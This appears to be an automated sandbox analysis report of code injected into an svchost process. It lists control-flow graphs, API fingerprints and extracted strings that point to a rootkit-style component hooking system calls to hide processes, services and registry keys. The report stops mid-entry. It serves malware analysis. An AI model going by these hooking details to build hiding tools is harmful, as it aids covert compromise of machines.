                                                control_flow_graph 85 17953772908-17953772973 call 17953770f34 * 4 94 17953772b8b 85->94 95 17953772979-1795377297c 85->95 97 17953772b8d-17953772ba9 94->97 95->94 96 17953772982-17953772985 95->96 96->94 98 1795377298b-1795377298e 96->98 98->94 99 17953772994-179537729b2 98->99 99->94 101 179537729b8-179537729dc call 17953770d6c 99->101 104 179537729de-17953772a09 call 17953770d6c 101->104 105 17953772a0b-17953772a12 101->105 104->105 107 17953772a18-17953772a25 105->107 108 17953772ab2-17953772ab9 105->108 107->108 112 17953772a2b-17953772a39 LoadLibraryA 107->112 109 17953772abf-17953772ad6 108->109 110 17953772b6c-17953772b89 108->110 109->110 113 17953772adc 109->113 110->97 114 17953772a9d-17953772aa5 112->114 115 17953772a3b-17953772a45 112->115 118 17953772ae2-17953772af7 113->118 114->112 116 17953772aa7-17953772aac 114->116 119 17953772a48-17953772a4c 115->119 116->108 122 17953772b5b-17953772b66 118->122 123 17953772af9-17953772b0a 118->123 120 17953772a4e-17953772a52 119->120 121 17953772a9a 119->121 124 17953772a7d-17953772a87 120->124 125 17953772a54-17953772a7b 120->125 121->114 122->110 122->118 127 17953772b0c-17953772b13 123->127 128 17953772b15-17953772b19 123->128 129 17953772a8d-17953772a98 124->129 125->129 130 17953772b48-17953772b59 127->130 131 17953772b1b-17953772b22 128->131 132 17953772b24-17953772b28 128->132 129->119 130->122 130->123 131->130 133 17953772b3a-17953772b3e 132->133 134 17953772b2a-17953772b38 132->134 133->130 135 17953772b40-17953772b43 133->135 134->130 135->130
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2926338703.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_17953770000_svchost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: 003fea010ce0f30714eb2280857b421f9bd90d63a9d1c744e4eabe7933ad54f1
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: B0612432B0566187EB6ACF15D4847ACB3E1FB46B98F548026DE2D07795EB38E857CB00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 231 179537a2cdc-179537a2d55 call 179537becc0 234 179537a2d5b-179537a2d61 231->234 235 179537a3090-179537a30b3 231->235 234->235 236 179537a2d67-179537a2d6a 234->236 236->235 237 179537a2d70-179537a2d73 236->237 237->235 238 179537a2d79-179537a2d89 GetModuleHandleA 237->238 239 179537a2d8b-179537a2d9b call 179537b3090 238->239 240 179537a2d9d 238->240 241 179537a2da0-179537a2dbe 239->241 240->241 241->235 245 179537a2dc4-179537a2de3 StrCmpNIW 241->245 245->235 246 179537a2de9-179537a2ded 245->246 246->235 247 179537a2df3-179537a2dfd 246->247 247->235 248 179537a2e03-179537a2e0a 247->248 248->235 249 179537a2e10-179537a2e23 248->249 250 179537a2e33 249->250 251 179537a2e25-179537a2e31 249->251 252 179537a2e36-179537a2e3a 250->252 251->252 253 179537a2e3c-179537a2e48 252->253 254 179537a2e4a 252->254 255 179537a2e4d-179537a2e57 253->255 254->255 256 179537a2f4d-179537a2f51 255->256 257 179537a2e5d-179537a2e60 255->257 260 179537a3082-179537a308a 256->260 261 179537a2f57-179537a2f5a 256->261 258 179537a2e72-179537a2e7c 257->258 259 179537a2e62-179537a2e6f call 179537a1a14 257->259 263 179537a2eb0-179537a2eba 258->263 264 179537a2e7e-179537a2e8b 258->264 259->258 260->235 260->249 265 179537a2f6b-179537a2f75 261->265 266 179537a2f5c-179537a2f68 call 179537a1a14 261->266 271 179537a2ebc-179537a2ec9 263->271 272 179537a2eea-179537a2eed 263->272 264->263 270 179537a2e8d-179537a2e9a 264->270 267 179537a2f77-179537a2f84 265->267 268 179537a2fa5-179537a2fa8 265->268 266->265 267->268 274 179537a2f86-179537a2f93 267->274 275 179537a2fb5-179537a2fc2 lstrlenW 268->275 276 179537a2faa-179537a2fb3 call 179537a1d28 268->276 277 179537a2e9d-179537a2ea3 270->277 271->272 278 179537a2ecb-179537a2ed8 271->278 279 179537a2efb-179537a2f08 lstrlenW 272->279 280 179537a2eef-179537a2ef9 call 179537a1d28 272->280 282 179537a2f96-179537a2f9c 274->282 288 179537a2fc4-179537a2fce 275->288 289 179537a2fe5-179537a2fef call 179537a3930 275->289 276->275 293 179537a2ffa-179537a3005 276->293 286 179537a2f43-179537a2f48 277->286 287 179537a2ea9-179537a2eae 277->287 290 179537a2edb-179537a2ee1 278->290 283 179537a2f2b-179537a2f3d call 179537a3930 279->283 284 179537a2f0a-179537a2f14 279->284 280->279 280->286 282->293 294 179537a2f9e-179537a2fa3 282->294 283->286 298 179537a2ff2-179537a2ff4 283->298 284->283 295 179537a2f16-179537a2f29 call 179537a1554 284->295 286->298 287->263 287->277 288->289 299 179537a2fd0-179537a2fe3 call 179537a1554 288->299 289->298 290->286 300 179537a2ee3-179537a2ee8 290->300 302 179537a3007-179537a300b 293->302 303 179537a307c-179537a3080 293->303 294->268 294->282 295->283 295->286 298->260 298->293 299->289 299->293 300->272 300->290 308 179537a3013-179537a302d call 179537a86a0 302->308 309 179537a300d-179537a3011 302->309 303->260 312 179537a3030-179537a3033 308->312 309->308 309->312 315 179537a3035-179537a3053 call 179537a86a0 312->315 316 179537a3056-179537a3059 312->316 315->316 316->303 318 179537a305b-179537a3079 call 179537a86a0 316->318 318->303
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: 49fe3da7658472f80655a8590b1efea23276f7a9504431454da11e10ce33b624
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: 8CB1CF32A28A6482FB6A8F65D4547E9A3B5F746B8CF545017EE4D53B94EF34CC88C340
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: e8bfa415f41d31c475037110bcc008507386401fbc5a7cc04ea91d7088d21a7c
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 25317072618B9096EB618FA0E8507EE7371F789748F44442BDA4D47B98EF38C64CC710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: ba80b338ea6e5c069091e1c0105fe7063c03fcc6fd82a0caca0eb8104bb9595a
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 17319E32618F9096EB61CF65E8503DE73B4F78A758F540126EA9D43BA8EF38C549CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: ee1056d205be9449170eb33c58af6fcd7c72c5137feb072d1d733fa74b030031
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: 16E1FF32B18AA09AE712CF64D4942DE7BB1F34678CF144517EE8E57B99EB38C51AC700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 4a52f6432ecd7d29496339e7aee66de67061697f76576b81f9c784fbe780843a
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: D7710D36B14A6885FB129F66E8606D937B5FB86B8CF405122DE4D57B68EF38C489C700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: 242f178902969ed05e7db39c4f9884770abd5e876cc59087611c71ca94d681af
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: D651A072A18B5493FB11CFA6E45439AB3B5F78AB88F448126DB4D47B14EF38D499CB00

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: f26b529a3a280a1e3bc0626f675bd49583e0889ff9157c4ab1e27ec038f586aa
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: FE31B270E29A6AA0FB47FF64E8616D42371B74634CFC05423E91E13765AE38C68DCB90

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 7ee9d80e101d04651c30a2cd6f7255030bf4b4242cf91b5e4f1f18af3282e3a0
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: 25214F36A1CB5493F7119B65F45439A73B1F78ABA8F504216EA9D02BA8DF3CC58DCB00

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: d3e5ddb8c7ea47e145821f6ccb884b43ef8b81797d3f302e12167a070b06dd6f
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: 56419133618B9097E761CF52E4443DAB7B1F389B88F408126EB8907B54EF38D1A8CB00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 346 179537769f0-179537769f6 347 179537769f8-179537769fb 346->347 348 17953776a31-17953776a3b 346->348 349 179537769fd-17953776a00 347->349 350 17953776a25-17953776a64 call 179537770a0 347->350 351 17953776b58-17953776b6d 348->351 352 17953776a18 __scrt_dllmain_crt_thread_attach 349->352 353 17953776a02-17953776a05 349->353 366 17953776a6a-17953776a7f call 17953776f34 350->366 367 17953776b32 350->367 354 17953776b6f 351->354 355 17953776b7c-17953776b96 call 17953776f34 351->355 362 17953776a1d-17953776a24 352->362 358 17953776a07-17953776a10 353->358 359 17953776a11-17953776a16 call 17953776fe4 353->359 360 17953776b71-17953776b7b 354->360 369 17953776bcf-17953776c00 call 17953777270 355->369 370 17953776b98-17953776bcd call 1795377705c call 17953776efc call 179537773f8 call 17953777210 call 17953777234 call 1795377708c 355->370 359->362 378 17953776b4a-17953776b57 call 17953777270 366->378 379 17953776a85-17953776a96 call 17953776fa4 366->379 371 17953776b34-17953776b49 367->371 380 17953776c02-17953776c08 369->380 381 17953776c11-17953776c17 369->381 370->360 378->351 399 17953776a98-17953776abc call 179537773bc call 17953776eec call 17953776f18 call 179537790dc 379->399 400 17953776ae7-17953776af1 call 17953777210 379->400 380->381 386 17953776c0a-17953776c0c 380->386 387 17953776c5e-17953776c74 call 17953772858 381->387 388 17953776c19-17953776c23 381->388 395 17953776cff-17953776d0c 386->395 407 17953776cac-17953776cae 387->407 408 17953776c76-17953776c78 387->408 389 17953776c2f-17953776c3d call 17953782758 388->389 390 17953776c25-17953776c2d 388->390 396 17953776c43-17953776c58 call 179537769f0 389->396 411 17953776cf5-17953776cfd 389->411 390->396 396->387 396->411 399->400 448 17953776abe-17953776ac5 __scrt_dllmain_after_initialize_c 399->448 400->367 419 17953776af3-17953776aff call 17953777260 400->419 409 17953776cb0-17953776cb3 407->409 410 17953776cb5-17953776cca call 179537769f0 407->410 408->407 416 17953776c7a-17953776c9c call 17953772858 call 17953776b58 408->416 409->410 409->411 410->411 428 17953776ccc-17953776cd6 410->428 411->395 416->407 440 17953776c9e-17953776ca6 call 17953782758 416->440 436 17953776b25-17953776b30 419->436 437 17953776b01-17953776b0b call 17953777178 419->437 433 17953776cd8-17953776cdf 428->433 434 17953776ce1-17953776cf1 call 17953782758 428->434 433->411 434->411 436->371 437->436 449 17953776b0d-17953776b1b 437->449 440->407 448->400 450 17953776ac7-17953776ae4 call 17953779078 448->450 449->436 450->400
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2926338703.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_17953770000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 60b4277ef502123304cdda403c19c92aaea76ebe1c7de292c57dba5dee19c896
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 0081D431F1C2A186FA57AB2698413D9A7F0EB8778CF544527DA0D8779ADB38C84E8704

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 453 179537a75f0-179537a75f6 454 179537a7631-179537a763b 453->454 455 179537a75f8-179537a75fb 453->455 456 179537a7758-179537a776d 454->456 457 179537a7625-179537a7664 call 179537a7ca0 455->457 458 179537a75fd-179537a7600 455->458 462 179537a777c-179537a7796 call 179537a7b34 456->462 463 179537a776f 456->463 475 179537a7732 457->475 476 179537a766a-179537a767f call 179537a7b34 457->476 460 179537a7602-179537a7605 458->460 461 179537a7618 __scrt_dllmain_crt_thread_attach 458->461 466 179537a7611-179537a7616 call 179537a7be4 460->466 467 179537a7607-179537a7610 460->467 464 179537a761d-179537a7624 461->464 473 179537a7798-179537a77cd call 179537a7c5c call 179537a7afc call 179537a7ff8 call 179537a7e10 call 179537a7e34 call 179537a7c8c 462->473 474 179537a77cf-179537a7800 call 179537a7e70 462->474 468 179537a7771-179537a777b 463->468 466->464 473->468 485 179537a7811-179537a7817 474->485 486 179537a7802-179537a7808 474->486 479 179537a7734-179537a7749 475->479 488 179537a7685-179537a7696 call 179537a7ba4 476->488 489 179537a774a-179537a7757 call 179537a7e70 476->489 491 179537a7819-179537a7823 485->491 492 179537a785e-179537a7874 call 179537a3458 485->492 486->485 490 179537a780a-179537a780c 486->490 506 179537a76e7-179537a76f1 call 179537a7e10 488->506 507 179537a7698-179537a76bc call 179537a7fbc call 179537a7aec call 179537a7b18 call 179537a9cdc 488->507 489->456 496 179537a78ff-179537a790c 490->496 497 179537a7825-179537a782d 491->497 498 179537a782f-179537a783d call 179537b3358 491->498 514 179537a7876-179537a7878 492->514 515 179537a78ac-179537a78ae 492->515 503 179537a7843-179537a7858 call 179537a75f0 497->503 498->503 518 179537a78f5-179537a78fd 498->518 503->492 503->518 506->475 528 179537a76f3-179537a76ff call 179537a7e60 506->528 507->506 556 179537a76be-179537a76c5 __scrt_dllmain_after_initialize_c 507->556 514->515 523 179537a787a-179537a789c call 179537a3458 call 179537a7758 514->523 516 179537a78b5-179537a78ca call 179537a75f0 515->516 517 179537a78b0-179537a78b3 515->517 516->518 537 179537a78cc-179537a78d6 516->537 517->516 517->518 518->496 523->515 549 179537a789e-179537a78a6 call 179537b3358 523->549 545 179537a7701-179537a770b call 179537a7d78 528->545 546 179537a7725-179537a7730 528->546 542 179537a78e1-179537a78f1 call 179537b3358 537->542 543 179537a78d8-179537a78df 537->543 542->518 543->518 545->546 555 179537a770d-179537a771b 545->555 546->479 549->515 555->546 556->506 557 179537a76c7-179537a76e4 call 179537a9c78 556->557 557->506
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: fe0b3c69a772beff74a310c280af15da20169bff3b51c378fc6cd5bad66cdd7b
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: F181A231F2C2E186F6579BE998513E963F2AB4778CF0840A7990DC7796EA38C94D8710

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 560 179537a9804-179537a9842 561 179537a9933 560->561 562 179537a9848-179537a984b 560->562 564 179537a9935-179537a9951 561->564 563 179537a9851 562->563 562->564 565 179537a9854 563->565 566 179537a992b 565->566 567 179537a985a-179537a9869 565->567 566->561 568 179537a9876-179537a9895 LoadLibraryExW 567->568 569 179537a986b-179537a986e 567->569 572 179537a9897-179537a98a0 call 179537b3080 568->572 573 179537a98ed-179537a9902 568->573 570 179537a9874 569->570 571 179537a990d-179537a991c call 179537b3090 569->571 576 179537a98e1-179537a98e8 570->576 571->566 582 179537a991e-179537a9929 571->582 580 179537a98a2-179537a98b7 call 179537aad28 572->580 581 179537a98cf-179537a98d9 572->581 573->571 574 179537a9904-179537a9907 FreeLibrary 573->574 574->571 576->565 580->581 585 179537a98b9-179537a98cd LoadLibraryExW 580->585 581->576 582->564 585->573 585->581
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: fb00aff284e09e6af16075ed21140bb303b4032a6c08bac2c3ba20d5d6053718
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: B731A531A2AB68A1FE179B06A8107DD63B4FB4BBA8F190526DD6D47384EF38C45D8300
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: 4dd854cc27738fee971dc4d248d953faf7b5b467519e62f606b3a150afd8830f
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: 3D11BF31B18B6486F7528B42E86439973B4F78AFE8F000226EA5D87794EF3CC9488740
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: de58720446573f38df410790958115264cac2ca19ba3ca045ca26aac2ae5ccaf
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: 14D1997661DB98C2DA719B1AE49439AB7B0F389B98F100216EACD47BA5DF3CC545CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: bb244d26d202178e2e698a051b50a56d7156bf69fd7b977937b4bd25da37fbb8
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: B4319331B19F6592FB56DF96E8446E963B0FB46B88F0440269E4C07F54FF38D4A98700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: 6c9f91e3a03382234b65fbc9f7c05ce95aea04b3e0e994b99970f10821bfc3a6
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: A2016D31B08A5596FB11DB52A8A839963B5F789FC8F884036DE8D43754EF3CC9C98700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: 328bcb0f3b657e4e7b0b0eb2427655a71625d9a7eea54b0913c3979adf7372be
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: EC116D74A19B6486FB229B61F82979663B4FB4AB89F040426CD4D07B54FF3CC04CC710
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 9468f93ce32db143040ae69ef994ffd20732e21772612c9d05215ff005760186
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: A251A132B296288AEB96CB15E444BDD33B5F347B9CF508122DA0E47B88EB35DC59C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: a9a055084eb90fbab25c282e8fff424a4fc1c979f75e7898b94f3ca87daab5c5
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: C931E032A2966496E712DF21E848B9D37B5F747B8CF048116EE4E03B84EB38C958C704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
